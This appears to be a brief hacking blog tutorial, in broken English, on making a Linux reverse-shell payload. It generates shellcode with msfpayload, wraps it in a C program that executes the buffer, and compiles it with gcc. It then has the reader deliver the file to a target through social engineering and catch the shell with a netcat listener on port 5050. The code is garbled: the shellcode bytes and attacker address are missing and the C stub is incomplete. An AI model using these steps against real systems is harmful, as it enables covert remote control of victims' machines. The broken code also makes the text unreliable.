This time we will do exploit the linux operating system, my friend may feel that linux is the most secure operating system is universal, but I said no, because there is no system in the world's safest, most ngak if the system is impenetrable ngak just use social engginer , ato administrator wrote kidnapped, then we ask hehehe .. The following example exploitasinya.
1. Get exploit code.
root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST= LPORT=5050 C
* linux/x86/shell_reverse_tcp - 71 bytes
* VERBOSE=false, LHOST=, LPORT=5050,
* ReverseConnectRetries=5, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
unsigned char buf[] =
2. Create a file exploit.
Open gedit then copy the result of the exploit code that we get.
edit to be like this fits under.
unsigned char buf[] =
int main(int argc, char **argv)
int (*funct)();
funct = (int (*)()) buf;
save it exploitbacktrack.c
3. Compile file exploit.
root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
4. Use Social engginer exploit file that floated to the target computer.
5. Open a new terminal and create a listener to wait for our exploit file dieksekusi.
root@bt:~# nc -lvp 5050
6. AndTarrrrraaaaaaaaaaaaaaaaaaaaaaa !!